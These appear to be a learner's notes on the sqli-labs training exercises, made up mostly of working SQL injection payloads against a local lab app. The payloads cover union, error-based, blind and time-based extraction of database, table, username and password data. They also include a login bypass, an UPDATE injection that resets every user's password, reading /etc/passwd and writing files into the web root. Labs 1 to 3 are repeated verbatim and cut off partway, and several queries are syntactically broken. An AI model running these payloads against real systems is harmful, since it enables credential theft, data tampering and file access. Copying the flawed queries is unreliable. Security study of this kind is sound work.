SQLi Lab: 1
url : http://localhost/sqli/Less-1/
http://localhost/sqli/Less-1/?id=1
http://localhost/sqli/Less-1/?id=1%27%20--+
' (semi-colon)= %27
space = %20
http://localhost/sqli/Less-1/?id=1
http://localhost/sqli/Less-1/?id=1'
http://localhost/sqli/Less-1/?id=1'space
http://localhost/sqli/Less-1/?id=1' --=
http://localhost/sqli/Less-1/?id=1' --+
http://localhost/sqli/Less-1/?id=1"
http://localhost/sqli/Less-1/?id=1" --+
http://localhost/sqli/Less-1/?id=1" --=
http://localhost/sqli/Less-1/?id=1" --+
To find out columns in a table, we use “order by”
http://localhost/sqli/Less-1/?id=1 order by 9 --+ → Unknown column '9'
http://localhost/sqli/Less-1/?id=1 order by 5 --+ → Unknown column '5'
http://localhost/sqli/Less-1/?id=1 order by 4 --+ → Unknown column '4'
http://localhost/sqli/Less-1/?id=1 order by 3 --+ → “success”
Result: Total 3 columns
http://localhost/sqli/Less-1/?id=1' union select 1,2,3 --+
Union: union will work only all the columns has same number of fields else error will be displayed.
http://localhost/sqli/Less-1/?id=1' union select 1,2,3 --+ → result displayed from 1 column
http://localhost/sqli/Less-1/?id=23451' union select 1,2,3 --+ → to escape from the column 1 result we will be changing the id value which is not exits in the column
http://localhost/sqli/Less-1/?id=14' union select 1,2,3 --+ → we get results till 14, means there are only 14 row or id values
http://localhost/sqli/Less-1/?id=15' union select 1,2,3 --+ → from id value 15, 2nd and 3rd query will be executed accordingly
http://localhost/sqli/Less-1/?id=23451' union select 1,version(),3 --+ → we injected to run the version of database query in 2nd position to run and we got 5.5.59-0ubuntu0.14.04.1
http://localhost/sqli/Less-1/?id=23451' union select 1,version(),database() --+ → to know the database, we have injected database() and the result we got security
Information schema has all the information of databases and tables.
TABLE_SCHEMA = database name
TABLE_NAME = table name of the database
COLUMN_NAME = column name of the table
so here query will be,
select TABLE_NAME from Information.schema.COLUMNS where TABLE_SCHEMA=security;
http://localhost/sqli/Less-1/?id=15' union select 1,(select TABLE_NAME from Information_schema.COLUMNS where TABLE_SCHEMA='security'),version() --+ → result: subquery returns more than 1 row
http://localhost/sqli/Less-1/?id=23451' union select 1,user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,system_user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,current_user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,schema(),session_user() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+ → displayed one of the table name
to find out next table one by one we use limit,
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1 --+ → result of 1st table name
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1 --+ → result of 2nd table name
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 --+ → result of 3rd table name
instead of find table name seperately, we can use group_concat command to display in one statement,
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ → we have got all the tables listed below,
Table name: email, referers, uagents, users
Database name: security
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(username),group_concat(password) from users --+
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(username),3 from users --+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab: 2
Url: http://localhost/sqli/Less-2/
http://localhost/sqli/Less-2/?id=0 → no result
http://localhost/sqli/Less-2/?id=1 → result
http://localhost/sqli/Less-2/?id=12 → result
http://localhost/sqli/Less-2/?id=13 → no result, got result till 12, means 12 records available
http://localhost/sqli/Less-2/?id=nesdfs → no result
http://localhost/sqli/Less-2/?id=ndfs1234 → no result
http://localhost/sqli/Less-2/?id=10938429379845 → no result
http://localhost/sqli/Less-2/?id=1\ → '\ LIMIT 0,1'
http://localhost/sqli/Less-2/?id=1' → got an error from MYSQL, '' LIMIT 0,1'
http://localhost/sqli/Less-2/?id=1'spacespace → error not fixed
http://localhost/sqli/Less-2/?id=1' --+ → error not fixed
http://localhost/sqli/Less-2/?id=1' --= → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or '1=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1='1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1'=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' # → error not fixed
since the developer didn't use any '-single quote, “-double quote or mixed with brackets ( or ), we can inject commands directly
localhost/sqli/Less-2/?id=-1 union select 1,database(),version() → injection worked
need to explore more all information as above......
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab:3
URL: 192.168.93.156/sqli/Less-3/?id=1
' ' 1' ') LIMIT 0,1 '
' ' 1\ ') LIMIT 0,1 '
' ') LIMIT 0,1 '
http://192.168.93.156/sqli/Less-3/?id=1') --> Broken the command
http://192.168.93.156/sqli/Less-3/?id=1') --+ --> Fixed the broken command
http://192.168.93.156/sqli/Less-3/?id=1') order by 4 --+ --> Unknown column '4' in 'order clause'
http://192.168.93.156/sqli/Less-3/?id=1') order by 3 --+ --> Results are displayed
http://192.168.93.156/sqli/Less-3/?id=-1') union select 1,5,4 --+
http://192.168.93.156/sqli/Less-3/?id=-1') union select 1,database(),version() --+
database name = security
sql version = 5.5.59-0ubuntu0.14.04.1
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab:4
URL: http://192.168.93.156/sqli/Less-4/?id=1"
http://192.168.93.156/sqli/Less-4/?id=1" --> Broken the code
' " 1" ") LIMIT 0,1 '
http://192.168.93.156/sqli/Less-4/?id=1") --> Broken the code
' ") LIMIT 0,1 '
http://192.168.93.156/sqli/Less-4/?id=1") or (" --> Fixed the code
http://192.168.93.156/sqli/Less-4/?id=1")--+ --> Fixed the code
http://192.168.93.156/sqli/Less-4/?id=1") union select 1,2,3,4 or (" --> SELECT statements have a different number of columns
http://192.168.93.156/sqli/Less-4/?id=-1") union select 1,55,378 or (" --> 2nd coloumn is working
http://192.168.93.156/sqli/Less-4/?id=-1") union select 1,2,3 --+ --> 2nd and 3rd coloumn is working
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab: 5
URL: http://192.168.93.156/sqli/Less-5/?id=1
http://192.168.93.156/sqli/Less-5/?id=1' --> Code has broken for ['] and it is vulnerable with SQL injection[''1'' LIMIT 0,1']
http://192.168.93.156/sqli/Less-5/?id=1" --> Page displayed as normal and no vulnerable for ["]
http://192.168.93.156/sqli/Less-5/?id=1\ --> Code has broken for [\] and it is vulnerable with SQL injection[''1\' LIMIT 0,1']
http://192.168.93.156/sqli/Less-5/?id=1\ --+ --> Code has fixed by commenting out[--]
http://192.168.93.156/sqli/Less-5/?id=1' --+ --> Code has fixed by commenting out[--]
http://192.168.93.156/sqli/Less-5/?id=1' '1 --> Code has fixed by matching
http://192.168.93.156/sqli/Less-5/?id=1' order by 1 and '1 --> To find out a columns we used "order by" but didn't help
"Order by" doesnot work if you are not using commands. We have to go for trial and error.
http://192.168.93.156/sqli/Less-5/?id=1' union select 1 and '1 --> doesn't works
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2 and '1 --> doesn't works
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2,3 and '1 --> it works, means it has 3 columns
http://192.168.93.156/sqli/Less-5/?id=1' union select 1,2,3,4 and '1 --> doesn't works
Developer's query is,
select col1, col2, col3 from table_name where id='$your_input';
Since we are not getting any output displayed and we can able to see the output only in the form of sql error. If we are able to produce mysql error in a controlled way then we can extract, what information is required for the enumeration.
select count(*) from information_schema;
select rand();
select floor();
select floor(rand()*2);
here, title of the column shows what we have provide. We can use alias to it.
select floor(rand()*2)as dump; [or]
select floor(rand()*2)dump
useful: select table_name, table_schema from infomation_schema.tables group by table_schema;
select database();
select (select database());
select concat(select database());
select concat(0x3a,0x3a(select database())0x3a,0x3a); --> Hex value of ' is 0x3a
select concat(0x3a,0x3a(select database())0x3a,0x3a)as aaa; --> Alias has set to aaa
select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))as aaa; --> Added some random with floor function
select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns;
select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))as aaa from information_schema.tables;
select count(*), concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa[0r]bbb; --> After some trys we got error messages. This error msg is generated by "Randomness" and it dumped as "Database: 'security'"
select count(*), concat(0x3a,0x3a(select version())0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by bbb; --> It dumped as "Database version: 5.1.62"
select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 1,1)0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays second table name
select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 2,1)0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays third table name
select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 0,1)0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa; --> displays first table name
(select 1 from (select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 0,1)0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa)bbb);
(select 1 from (select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 0,1)0x3a,0x3a, floor(rand()*2))as aaa from information_schema.columns group by aaa)bbb);
By changing the limit values, we can get the name of the tables
To find out the column names,
(select 1 from (select count(*), concat(0x3a,0x3a(select column_name from information_schema.columns where table_name='users' limit 0,1)0x3a,0x3a, round(rand()*2,1))as aaa from information_schema.columns group by aaa)bbb);
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Double Query Injection:
localhost/sqli-labs/Less-5/?id=1
localhost/sqli-labs/Less-5/?id=2
localhost/sqli-labs/Less-5/?id=3
localhost/sqli-labs/Less-5/?id=1'
localhost/sqli-labs/Less-5/?id=1\
select col1,col2,col3 from table where id=' 1' OR '1 '
localhost/sqli-labs/Less-5/?id=1' --+
localhost/sqli-labs/Less-5/?id=1' #
There is no way to display the output from the database of our query. We have to create
an error messages in a controlled way to display of output from the database. hence it is
semi-blind SQL injection.
some functions from database,
mysql>select count(*) from information_schema.tables;
mysql>select count(*) from information_schema.columns;
mysql>select rand();
mysql>select rand()*4;
mysql>select floor(2.4536759379374);
mysql>select rand()*2;
mysql>select floor(rand()*2);
mysql>select floor(rand()*2)as dumb;
mysql>select floor(rand()*2)dumb;
mysql>select table_name,table_schema from information_schema.tables group by table_schema;
mysql>select database();
mysql>select (select databasae());
mysql>select concat(0x3a,0x3a(select database())0x3a,0x3a);
mysql>select concat(0x3a,0x3a(select database())0x3a,0x3a)a;
mysql>select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))a;
mysql>select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))a from information_schema.columns;
mysql>select concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))a from information_schema.tables;
mysql>select count(*), concat(0x3a,0x3a(select database())0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select version())0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select user())0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database())0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
--> error, subquery returns more than 1 row bcoz we didn't define the LIMIT function
mysql>select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 0,1)0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 1,1)0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 2,1)0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
mysql>select count(*), concat(0x3a,0x3a(select table_name from information_schema.tables where table_schema=database() limit 3,1)0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a;
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Double Query Injection: Continued...
select count(*), concat(0x3a,0x3a,(select database())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a;
Need to use paranthesis '()' in frontend
(select count(*), concat(0x3a,0x3a,(select database())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a) ->> it gave an error, i.e., operand should contain 1 column
To fix the above query,
(select 1 from (select count(*), concat(0x3a,0x3a,(select database())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a))
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a))
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select database())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b)
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select version())),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a))
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a))
we can use "round" function instead of floor,
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database()limit 0,1),0x3a,0x3a, round(rand()*2,1))a from information_schema.columns group by a))
we can enumurate even column name as well,
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.column where table_name="users" limit 0,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)) --> displays the value of 1st column
localhost/Less-5/?id=1'AND (select 1 from (select count(*), concat(0x3a,0x3a,(select column_name from information_schema.column where table_name="users" limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)) --> displays the value of 2nd
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Blind Injection - Boolean Based
URL: localhost/sqli-labs/Less-8/?id-1
localhost/sqli-labs/Less-8/?id-1' --> didn't get a result
localhost/sqli-labs/Less-8/?id-1' --+ --> some results are displayed as expected
localhost/sqli-labs/Less-8/?id-1' AND 1 --+ --> displayed some results
localhost/sqli-labs/Less-8/?id-1' AND 0 --+ --> intentional false statement, result as expected
If we inject a query, we don't get any in the display as it is a blind based sql injection.
Even errors are also missing.
From backend database,
use security;
select database();
select length(database());
select substr(database(),1,1); --> substring function takes 3 parameters,(string, where to start counting, how much to count for)
select ascii(substr(database(),1,1));
localhost/sqli-labs/Less-8/?id-1' AND (ascii(substr((select database()),1,1)))=98 --+
localhost/sqli-labs/Less-8/?id-1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100 --+
localhost/sqli-labs/Less-8/?id-1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>102 --+
localhost/sqli-labs/Less-8/?id-1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>101 --+
localhost/sqli-labs/Less-8/?id-1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101 --+
We can use the tools for the same like,
Burp, ZAP, Fiddler
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Blind Injection - Time Based
In previos lessions we found something dumping in the screen as it has visible sign to gave us an idea.
But in this, we don't have any sign or differentiation
From backend database, we learn function called sleep()
mysql>use security;
mysql>select sleep(10); --> waiting 10 sec to display the results
We use timecharacter to make results as true or false.
mysql>select if(condition,value return if condition is true, value return if condition is false)
mysql>select if((select database())="security",sleep(10),null);
As there is no sign of sql injection vulnerable in screen will make use of sleep() function,
from application,
localhost/sqli-labs/Less-9/?id=1' and sleep(10) --+ --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select database())="security",sleep(10),null) --+ --> --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select version()) like "5%",sleep(10),null) --+ --> --> it works
localhost/sqli-labs/Less-9/?id=1' and if((select substr(table_name,1,1) from information_schema.tables where table_schema=database()),sleep(10),null) --+ --> --> it works
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dumping Database Using Outfile:
localhost/sqli-labs/Less-7/?id=1 --> Normal results displayed. URL
localhost/sqli-labs/Less-7/?id=7 --> No error
localhost/sqli-labs/Less-7/?id=50 --> Error message
localhost/sqli-labs/Less-7/?id=news --> Error message
localhost/sqli-labs/Less-7/?id=\ --> Error message
localhost/sqli-labs/Less-7/?id=1' --> Error message
localhost/sqli-labs/Less-7/?id=1" --> No Error message
localhost/sqli-labs/Less-7/?id=1' --+ --> Query didn't fixed
localhost/sqli-labs/Less-7/?id=1') --+ --> Query didn't fixed
localhost/sqli-labs/Less-7/?id=1')) --+ --> Query is fixed
localhost/sqli-labs/Less-7/?id=2')) --+ --> Query is fixed
localhost/sqli-labs/Less-7/?id=1')) (('1 --> Query is fixed
localhost/sqli-labs/Less-7/?id=1')){execute command safely} --+ --> Query fixed
Database backend:
use database;
select * from users;
select * from users into outfile "/tmp/test.txt"; -->> Just dumping complete file into test.txt
select * from users into dumpfile "/tmp/test1.txt"; -->> Error, dumpfile command can dump a single line not more than that
select * from users limit 0,1 into dumpfile "/tmp/test1.txt"; -->> Error, dumpfile cannot be able to overwrite an existing file
[mysql should not run with root privilege]
select load_file("/etc/passwd") into outfile "/tmp/test4.txt"; -->>
localhost/sqli-labs/Less-7/?id=1'))order by 4 --+ -->> displayed error msg
localhost/sqli-labs/Less-7/?id=1'))order by 3 --+ -->> not dispalyed any error
localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile "/var/www/sqli-labs/Less-7/union1.txt" --+ -->>
localhost/sqli-labs/Less-7/union1.txt
localhost/sqli-labs/Less-7/?id=1')) union select 1, database(),version() into outfile "/var/www/sqli-labs/Less-7/union2.txt" --+ -->>
localhost/sqli-labs/Less-7/union2.txt
localhost/sqli-labs/Less-7/?id=1')) union select 1,select table_name from information_schema.tables where table_schema='security',version() into outfile "/var/www/sqli-labs/Less-7/union3.txt" --+ -->>
localhost/sqli-labs/Less-7/union3.txt
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Dumping Database:
localhost/sqli-labs/Less-7/?id=1')) --+
localhost/sqli-labs/Less-7/?id=1')) or (('1
will test from backend in the database,
mysql>select security;
mysql>show tables;
mysql>select * from users;
mysql>select * from users into outfile "/tmp/test.txt"
mysql>select * from users into dumpfile "/tmp/test1.txt"
mysql>select * from users limit 0,1 into dumpfile "/tmp/test1.txt"
mysql>select * from users limit 0,1 into dumpfile "/tmp/test2.txt"
Outfile: It just dump the results of the query to a file.
Dumpfile: It dumps only one line in a file and it cannot be overwrite the existing file.
To get rectified this problem will use limit function.
Loadfile: It is used to load the files from filesystem to mysql
mysql>select load_file("/etc/passwd");
mysql>select load_file("/etc/passwd") into outfile "/tmp/test3.txt";
localhost/sqli-labs/Less-7/?id=1')) order by 3 --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,2,3 into outfile"/tmp/test4.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,database(),version() into outfile"/var/www/sqli-labs/Less-7/union1.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,table_name,3 from information_schema.tables where table_schema=security() into outfile"/var/www/sqli-labs/Less-7/union2.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,table_name,3 from information_schema.tables into outfile"/var/www/sqli-labs/Less-7/union3.txt" --+
localhost/sqli-labs/Less-7/?id=1')) union select 1,usersname,password from users into outfile"/var/www/sqli-labs/Less-7/union4.txt" --+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection - Error Based
localhost/sqli-labs/Less-12/
below are the test senario to break the query,
'
"
''
""
')
")
\
below to fix the query which is breaking,
") --(space) OR ") # OR try ") --+
") or 1=1 #
") or 1=1 LIMIT0,1 #
") or 1=1 LIMIT1,1 #
") or 1=1 LIMIT2,1 #
") or 1=1 LIMIT3,1 #
to find out how many columns are used by the developer with below "order by" function,
") order by 4 #
") order by 3 #
") order by 2 #
'""") and password=("") LIMIT 0,1'
'"\") and password=("") LIMIT 0,1'
select * from table where username=("$uname") and password=("$passwd") LIMIT0,1
select col1, col2 from table where username=("$uname") and password=("$passwd") LIMIT0,1
") union select 1,2 #
") union select database(),version() #
") union select 1,table from information_schema.tables where table_schema=database() #
") union select 1,table from information_schema.tables where table_schema=database() LIMIT 1,1 #
") union select 1,table from information_schema.tables where table_schema=database() LIMIT 2,1 #
") union select 1,table from information_schema.tables where table_schema=database() LIMIT 3,1 #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection - Double Query based
localhost/sqli-labs/Less-14/
try to use the combination of strings, numbers and special characters
9834756 --> failed login attempts
admin/admin --> failed login attempts
9849357/admin --> failed login attempts
admin/password --> failed login attempts
' --> didn't breaks the query
'/' --> didn't breaks the query
') --> didn't breaks the query
;)) --> didn't breaks the query
" --> success, breaks the query
" -- OR " # --> fixing the query
" # --> failed login attempts
" or 1=1 # --> successfully logged-in
from database backend,
mysql>use security;
mysql>select database();
mysql>select concat((select database()));
mysql>select concat("~",(select database()),"~",floor(rand(0)*2));
mysql>select concat("~",(select database()),"~",floor(rand(0)*2)) from information_schema.tables;
mysql>select (concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables;
mysql>select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c;
select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a
in front end i.e website login page,
' AND (select 1 from (select count(*),(concat("~",(select database()),"~",floor(rand(0)*2)))c from information_schema.tables group by c)a) #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection BLIND Boolean and Timebased
localhost/sqli-labs/Less-16/
try all the possibilities to break the query,
since it is a blind we will assume that we broken the query. We will come to know the what breaks the query while fixing the query by guessing.
' # OR " # OR ') # OR ") # OR ')) # OR ")) #
") or 1=1 # --> fix the query, means ") is used by the delevoper
") and sleep(10) # --> didn't worked
") or sleep(10) # --> it worked, displayed as "waiting for localhost"
developer query is like,
select col1, col2 from table where username=("") AND sleep(15) # ") and password=("some data"); --> didn't worked
select col1, col2 from table where username=("SOME DATA") AND sleep(15) # ") and password=("some data"); --> it worked
Timebased:
admin") and if(1=1,sleep(10),null) #
admin") and if(database()='security',sleep(10),null) #
Boolean based:
admin") and (select database()='security') #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
POST Parameter Injection in UPDATE Query
localhost/sqli-labs/Less-17/
URL loaded is a password reset page.
from backend database,
mysql>select * from users where username="admin";
mysql>update users SET password='12345' where username='admin';
assuming the query created by the developer is,
UPDATE users SET password="some variable" where username="admin";
here by the combination of value like,
'/' --> didn't break
"/" --> didn't break
' --> didn't break
" --> didn't break
/ --> didn't break
admin/' --> broken
admin/' or 1=1 # --> successfully loggedin, means fixed the query
the above query has changed the password for all the users in the users table,
UPDATE users SET password='' or 1=1 # ' where username='admin';
Since it is a password updation page, it is not interacting with the users(displaying anything to us from the databse) and hence will use DOUBLE QUERY INJECTION to display some errors, through this will enumurate all information we want.
' AND (select 1 from (select count(*),(concat("~",(select @@datadir),"~",floor(rand(0)*2) from information_schema.tables group by c)a) #
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
url : http://localhost/sqli/Less-1/
http://localhost/sqli/Less-1/?id=1
http://localhost/sqli/Less-1/?id=1%27%20--+
' (semi-colon)= %27
space = %20
http://localhost/sqli/Less-1/?id=1
http://localhost/sqli/Less-1/?id=1'
http://localhost/sqli/Less-1/?id=1'space
http://localhost/sqli/Less-1/?id=1' --=
http://localhost/sqli/Less-1/?id=1' --+
http://localhost/sqli/Less-1/?id=1"
http://localhost/sqli/Less-1/?id=1" --+
http://localhost/sqli/Less-1/?id=1" --=
http://localhost/sqli/Less-1/?id=1" --+
To find out columns in a table, we use “order by”
http://localhost/sqli/Less-1/?id=1 order by 9 --+ → Unknown column '9'
http://localhost/sqli/Less-1/?id=1 order by 5 --+ → Unknown column '5'
http://localhost/sqli/Less-1/?id=1 order by 4 --+ → Unknown column '4'
http://localhost/sqli/Less-1/?id=1 order by 3 --+ → “success”
Result: Total 3 columns
http://localhost/sqli/Less-1/?id=1' union select 1,2,3 --+
Union: union will work only all the columns has same number of fields else error will be displayed.
http://localhost/sqli/Less-1/?id=1' union select 1,2,3 --+ → result displayed from 1 column
http://localhost/sqli/Less-1/?id=23451' union select 1,2,3 --+ → to escape from the column 1 result we will be changing the id value which is not exits in the column
http://localhost/sqli/Less-1/?id=14' union select 1,2,3 --+ → we get results till 14, means there are only 14 row or id values
http://localhost/sqli/Less-1/?id=15' union select 1,2,3 --+ → from id value 15, 2nd and 3rd query will be executed accordingly
http://localhost/sqli/Less-1/?id=23451' union select 1,version(),3 --+ → we injected to run the version of database query in 2nd position to run and we got 5.5.59-0ubuntu0.14.04.1
http://localhost/sqli/Less-1/?id=23451' union select 1,version(),database() --+ → to know the database, we have injected database() and the result we got security
Information schema has all the information of databases and tables.
TABLE_SCHEMA = database name
TABLE_NAME = table name of the database
COLUMN_NAME = column name of the table
so here query will be,
select TABLE_NAME from Information.schema.COLUMNS where TABLE_SCHEMA=security;
http://localhost/sqli/Less-1/?id=15' union select 1,(select TABLE_NAME from Information_schema.COLUMNS where TABLE_SCHEMA='security'),version() --+ → result: subquery returns more than 1 row
http://localhost/sqli/Less-1/?id=23451' union select 1,user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,system_user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,current_user(),database() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,schema(),session_user() --+
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+ → displayed one of the table name
to find out next table one by one we use limit,
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1 --+ → result of 1st table name
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1 --+ → result of 2nd table name
http://localhost/sqli/Less-1/?id=23451' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1 --+ → result of 3rd table name
instead of find table name seperately, we can use group_concat command to display in one statement,
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+ → we have got all the tables listed below,
Table name: email, referers, uagents, users
Database name: security
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(username),group_concat(password) from users --+
http://localhost/sqli/Less-1/?id=23451' union select 1,group_concat(username),3 from users --+
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab: 2
Url: http://localhost/sqli/Less-2/
http://localhost/sqli/Less-2/?id=0 → no result
http://localhost/sqli/Less-2/?id=1 → result
http://localhost/sqli/Less-2/?id=12 → result
http://localhost/sqli/Less-2/?id=13 → no result, got result till 12, means 12 records available
http://localhost/sqli/Less-2/?id=nesdfs → no result
http://localhost/sqli/Less-2/?id=ndfs1234 → no result
http://localhost/sqli/Less-2/?id=10938429379845 → no result
http://localhost/sqli/Less-2/?id=1\ → '\ LIMIT 0,1'
http://localhost/sqli/Less-2/?id=1' → got an error from MYSQL, '' LIMIT 0,1'
http://localhost/sqli/Less-2/?id=1'spacespace → error not fixed
http://localhost/sqli/Less-2/?id=1' --+ → error not fixed
http://localhost/sqli/Less-2/?id=1' --= → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or '1=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1='1 → error not fixed
http://localhost/sqli/Less-2/?id=1' or 1'=1 → error not fixed
http://localhost/sqli/Less-2/?id=1' # → error not fixed
since the developer didn't use any '-single quote, “-double quote or mixed with brackets ( or ), we can inject commands directly
localhost/sqli/Less-2/?id=-1 union select 1,database(),version() → injection worked
need to explore more all information as above......
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
SQLi Lab:3
URL: 192.168.93.156/sqli/Less-3/?id=1
' ' 1' ') LIMIT 0,1 '
' ' 1\ ') LIMIT 0,1 '
' ') LIMIT 0,1 '
http://192.168.93.156/sqli/Less-3/?id=1') --> Broken the command
http://192.168.93.156/sqli/Less-3/?id=1') --+ --> Fixed the broken command
http://192.168.93.156/sqli/Less-3/?id=1') order by 4 --+ --> Unknown column '4' in 'order clause'
